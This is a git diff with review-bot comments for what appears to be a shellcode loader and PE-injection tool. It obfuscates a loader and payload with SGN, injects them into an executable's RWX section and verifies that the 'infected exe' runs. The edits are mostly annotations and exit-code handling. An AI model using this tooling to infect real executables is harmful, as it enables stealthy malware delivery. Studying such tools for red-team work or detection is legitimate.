diff --git a/pehelper.py b/pehelper.py
index 3819415..aded9a7 100644
--- a/pehelper.py
+++ b/pehelper.py
@@ -32,7 +32,7 @@ def write_code_section(exe_file: FilePath, new_data: bytes):
 f.write(new_data)
-def get_code_section(pe) -> pefile.SectionStructure:
+def get_code_section(pe: pefile.PE) -> pefile.SectionStructure:
 entrypoint = pe.OPTIONAL_HEADER.AddressOfEntryPoint
 for sect in pe.sections:
 if sect.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']:
@@ -106,7 +106,7 @@ def extract_iat(pe: pefile.PE):
 return iat
-def get_addr_for(iat, func_name):
+def get_addr_for(iat, func_name: str) -> int:
 for dll_name in iat:
 for entry in iat[dll_name]:
 if entry["func_name"] == func_name:
diff --git a/phases/injector.py b/phases/injector.py
index 6a056d1..896ddf6 100644
--- a/phases/injector.py
+++ b/phases/injector.py
@@ -56,8 +56,8 @@ def inject_exe(
 # write back our patched code into the exe
 write_code_section(exe_file=exe_out, new_data=code)
-
-def verify_injected_exe(exefile: FilePath):
+
+def verify_injected_exe(exefile: FilePath) -> int:
 logger.info("---[ Verify infected exe: {} ".format(exefile))
 # remove indicator file
 pathlib.Path(project.verify_filename).unlink(missing_ok=True)
@@ -70,8 +70,8 @@ def verify_injected_exe(exefile: FilePath):
 logger.info("---> Verify OK. Infected exe works (file was created)")
 # better to remove it immediately
 os.remove(project.verify_filename)
- return True
+ return 0
 else:
 logger.error("---> Verify FAIL. Infected exe does not work (no file created)")
- return False
+ return 1
diff --git a/project.py b/project.py
index 095e8e9..eee05ef 100644
--- a/project.py
+++ b/project.py
@@ -1,6 +1,7 @@
 from model import *
 from defs import *
+
 class Project():
 def __init__(self):
 # User, generating normally
@@ -32,7 +33,7 @@ class Project():
 self.generate_asm_from_c: bool = True
 self.generate_shc_from_asm: bool = True
- self.verify_filename = r'C:\Temp\a'
+ self.verify_filename: FilePath = r'C:\Temp\a'
 project = Project()
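Review bot: `get_addr_for` gains `-> int` in the -106 hunk, but only the search loop is inside the hunk; if the code after the loop returns `None` when no entry matches `func_name`, the honest annotation is `-> int | None`, or the miss should `raise KeyError(func_name)` so callers cannot silently use `None` as an address. The `iat` parameter stays unannotated although the loop body fixes its shape (keys iterated as DLL names, values as lists of dicts with a `"func_name"` key), so `iat: dict[str, list[dict]]` is supportable from the hunk alone. Neither `get_code_section` (-32 hunk) nor `get_addr_for` has a docstring after this annotation pass; a one-line docstring on each stating which section or address is returned would help, since the selection logic runs past both hunks. Both function bodies continue outside the hunks.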
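Review bot: `verify_injected_exe` now returns `0`/`1` (the -70 hunk) where it returned `True`/`False`, so the truthiness of the result is inverted — any caller still written as `if verify_injected_exe(...)` treats failure as success. The -236 hunk of supermega.py updates its one visible call site, but nothing in the diff records the new contract; a docstring under the new signature in the -56 hunk, e.g. `"""Return an exit status: 0 when the indicator file was found, 1 otherwise."""`, would make the `-> int` meaningful. The function body between the two hunks is outside the diff.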
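Review bot: `FilePath` is used as an annotation on `self.verify_filename` in the -32 hunk, but the module brings names in only through `from model import *` and `from defs import *`, so neither a reader nor a linter (F405) can tell which module defines it; import it explicitly, `from defs import FilePath` or the `model` equivalent, whichever declares it. `Project.__init__` continues outside the hunk.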
diff --git a/supermega.py b/supermega.py
index 36bad6f..e3f28f3 100644
--- a/supermega.py
+++ b/supermega.py
@@ -151,10 +151,6 @@ def start():
 else:
 logger.info("--[ Some imports are missing for the shellcode to use IAT_REUSE")
 project.source_style = SourceStyle.peb_walk
-
- #observer.add_json("capabilities_a", project.exe_capabilities)
- #observer.add_json("options", options)
-
 logger.warning("--[ SourceStyle: {}".format(project.source_style.name))
 # Copy: loader C files into working directory: build/
@@ -165,7 +161,7 @@ def start():
 decoder_style= project.decoder_style,
 )
- # Convert: C -> ASM
+ # Compile: C -> ASM
 if project.generate_asm_from_c:
 # Find payload size
 with open(project.payload, 'rb') as input2:
@@ -177,18 +173,18 @@ def start():
 payload_len = payload_length,
 exe_capabilities = project.exe_capabilities)
- # Convert: ASM -> Shellcode
+ # Assemble: ASM -> Shellcode
 if project.generate_shc_from_asm:
 phases.assembler.asm_to_shellcode(
 asm_in = main_asm_file,
 build_exe = main_exe_file,
 shellcode_out = main_shc_file)
- # Try: Starting the shellcode (rarely useful)
+ # Try: Starting the loader-shellcode (rarely useful)
 if project.try_start_loader_shellcode:
 try_start_shellcode(main_shc_file)
- # Merge shellcode/loader with payload
+ # Merge: shellcode/loader with payload
 if project.dataref_style == DataRefStyle.APPEND:
 phases.assembler.merge_loader_payload(
 shellcode_in = main_shc_file,
@@ -209,26 +205,18 @@ def start():
 # copy it to out
 shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file)))
- # SGN
- # after we packed everything (so jmp to end of code still works)
- #if options["obfuscate_shc_loader"] and project.exe_capabilities.rwx_section != None:
+ # RWX Injection
 if project.exe_capabilities.rwx_section != None:
 logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format(
 project.exe_capabilities.rwx_section.Name.decode().rstrip('\x00')
 ))
 obfuscate_shc_loader(main_shc_file, main_shc_file + ".sgn")
- observer.add_code("payload_sgn", file_readall_binary(main_shc_file + ".sgn"))
 shutil.move(main_shc_file + ".sgn", main_shc_file)
-
- #if options["verify"]:
- # if not verify_shellcode("main-clean.bin"):
- # return
 # inject merged loader into an exe
+ exit_code = 0
 if project.inject:
- #debug_data["original_exe"] = file_readall_binary(options["inject_exe_in"])
-
 phases.injector.inject_exe(
 shellcode_in = main_shc_file,
 exe_in = project.inject_exe_in,
@@ -236,26 +224,21 @@ def start():
 exe_capabilities = project.exe_capabilities
 )
 if project.verify:
- logger.info("--[ Verify final exe")
- if phases.injector.verify_injected_exe(project.inject_exe_out):
- #debug_data["infected_exe"] = file_readall_binary(options["inject_exe_out"])
- pass
+ logger.info("--[ Verify infected exe")
+ exit_code = phases.injector.verify_injected_exe(project.inject_exe_out)
- if project.try_start_final_infected_exe:
+ elif project.try_start_final_infected_exe:
 logger.info("--[ Start infected exe")
 run_process_checkret([
 project.inject_exe_out,
 ], check=False)
- # dump the info i gathered
- #file = open('latest.pickle', 'wb')
- #pickle.dump(data, file)
- #file.close()
-
- # delete files
+ # Cleanup files
 if project.cleanup_files_on_exit:
 clean_files()
+ exit(exit_code)
+
 def obfuscate_shc_loader(file_shc_in, file_shc_out):
 logger.info("--[ Obfuscate shellcode with SGN")
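Review bot: `exit(exit_code)` at the end of `start()` in the -236 hunk uses the site-module `exit` builtin, which is intended for interactive sessions and is absent under `python -S`; program code should use `sys.exit(exit_code)` (importing `sys` if it is not already), and better still `start()` should `return exit_code` and let the `__main__` guard call `sys.exit(start())`, so the function remains usable from an importer or a test. Turning `if project.try_start_final_infected_exe:` into `elif` also means that branch is skipped whenever `project.verify` is set; if that is intended, a short comment above the `elif` saying so would stop the next reader from "fixing" it. In the -209 hunk the retained `project.exe_capabilities.rwx_section != None` should be `is not None`. `start()` begins outside both hunks.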